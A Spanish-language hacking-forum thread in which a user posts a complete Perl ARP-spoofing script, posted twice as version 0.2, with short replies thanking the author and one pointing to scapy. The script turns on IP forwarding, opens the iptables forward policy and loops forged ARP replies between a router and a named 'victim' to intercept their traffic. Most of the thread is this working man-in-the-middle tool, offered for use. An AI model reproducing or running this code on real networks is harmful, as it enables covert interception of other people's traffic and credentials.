Simple ARP-Spoofer escrito en Perl, recien salido del horno, espero que les guste / sirva :Pv0.2:- IPTables forwarding añadido (gracias averno)
- Restauración de mac's originales y forwarding
- Mas info en ejecucion
Screenshot:
(http://img834.imageshack.us/img834/1765/pantallazouc.png)
Wireshark dump:
(http://img12.imageshack.us/img12/4066/dumpha.png)
Code:
#!/usr/bin/perl
# Perl ARP-Spoofer By Login-Root
# Long life Camacho Tequila
# 2011 shit
# Run it as root
# Net::ARP & Net::Ping requerido
use Net::ARP;
use Net::Ping;
if ($< != 0)
{
print "\n[!] Run it as root\n\n";
exit(0);
}
if(!$ARGV[2])
{
print "\n###########################################";
print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
print "\n###########################################";
print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
exit(0);
}
sub finaliza
{
print "\n\n[!] Restaurando cache ARP de host's remotos\n";
print "\n[+] $host1 is-at $mac1 (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
print "\n[+] $host2 is-at $mac2 (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');
print "\n\n[!] Deshabilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "0";
close(FORWD);
system("iptables -P FORWARD DROP");
print "\n[!] Saliendo...\n\n";
exit(0);
}
($dev, $host1, $host2) = @ARGV;
print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";
$lmac = Net::ARP::get_mac($dev);
print "\n[!] MAC Local : $lmac";
my $ping = Net::Ping->new('icmp');
$ping->ping($host1, 2);
$ping->ping($host2, 2);
$mac1 = Net::ARP::arp_lookup($dev,$host1);
$mac2 = Net::ARP::arp_lookup($dev,$host2);
print "\n[!] MAC Host 1: $mac1";
print "\n[!] MAC Host 2: $mac2";
print "\n\n[!] Habilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "1";
close(FORWD);
# (thnx averno)
system("iptables -P FORWARD ACCEPT");
print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";
while(1)
{
$SIG{INT} = \&finaliza;
sleep(1);
print "\n[+] $host1 is-at $lmac (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
print "\n[+] $host2 is-at $lmac (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');
}
__END__
Ctrl-C para terminar y dejaras las cosas mas que bien ;-)
El ip_forwarding en muchos sistemas Linux no es suficiente con cambiar bien con sysctl o directamente via /proc el valor de ip_forward.. Que hay de Iptables, tiene las reglas de forwarding habilitadas?? Que hay sobre /etc/rc.d/* .. habra algun script de inicio que lo impida?
Mi idea es hacer una simple demostración de arp spoofing en perl, no reinventar la rueda rehaciendo la suite dsniff ;-)
Saludos
Gracias por la aportacion entonces :laugh:
Gracias a las ideas de averno saco la v0.2 ;D
v0.2:- IPTables forwarding añadido (gracias averno)
- Restauración de mac's originales y forwarding
- Mas info en ejecucion
Screenshot:
(http://img834.imageshack.us/img834/1765/pantallazouc.png)
Wireshark dump:
(http://img12.imageshack.us/img12/4066/dumpha.png)
Code:
#!/usr/bin/perl
# Perl ARP-Spoofer By Login-Root
# Long life Camacho Tequila
# 2011 shit
# Run it as root
# Net::ARP & Net::Ping requerido
use Net::ARP;
use Net::Ping;
if ($< != 0)
{
print "\n[!] Run it as root\n\n";
exit(0);
}
if(!$ARGV[2])
{
print "\n###########################################";
print "\n# Perl ARP-Spoofer v0.2 | Login-Root Pwnz #";
print "\n###########################################";
print "\n\nUse: perl $0 [INTERFACE] [HOST 1 (Router)] [HOST 2 (Victim)]\n\n";
exit(0);
}
sub finaliza
{
print "\n\n[!] Restaurando cache ARP de host's remotos\n";
print "\n[+] $host1 is-at $mac1 (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $mac1, $mac2, 'reply');
print "\n[+] $host2 is-at $mac2 (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $mac2, $mac1, 'reply');
print "\n\n[!] Deshabilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "0";
close(FORWD);
system("iptables -P FORWARD DROP");
print "\n[!] Saliendo...\n\n";
exit(0);
}
($dev, $host1, $host2) = @ARGV;
print "\n[+] Perl ARP-Spoofer v0.2 starting | Login-Root [+]\n";
$lmac = Net::ARP::get_mac($dev);
print "\n[!] MAC Local : $lmac";
my $ping = Net::Ping->new('icmp');
$ping->ping($host1, 2);
$ping->ping($host2, 2);
$mac1 = Net::ARP::arp_lookup($dev,$host1);
$mac2 = Net::ARP::arp_lookup($dev,$host2);
print "\n[!] MAC Host 1: $mac1";
print "\n[!] MAC Host 2: $mac2";
print "\n\n[!] Habilitando forwarding...";
open(FORWD,">"."/proc/sys/net/ipv4/ip_forward") || die "\n[-] Error abriendo ip_forward";
print FORWD "1";
close(FORWD);
# (thnx averno)
system("iptables -P FORWARD ACCEPT");
print "\n\n[!] Comenzando ARP-Spoofing entre $host1 & $host2, Ctrl-C para finalizar...\n";
while(1)
{
$SIG{INT} = \&finaliza;
sleep(1);
print "\n[+] $host1 is-at $lmac (to $host2)";
Net::ARP::send_packet($dev, $host1, $host2, $lmac, $mac2, 'reply');
print "\n[+] $host2 is-at $lmac (to $host1)";
Net::ARP::send_packet($dev, $host2, $host1, $lmac, $mac1, 'reply');
}
__END__
De nada !
A ver si la pruebo en unos dias, y gracias por la aportacion.
;D
buen aporte, para la gente que esté interesada y que le guste python, existe una programita que se llama scapy, que además tiene una API con la que podemos trabajar en python, y sirve para todo el tema de manipular paquetes de red, es MUY potente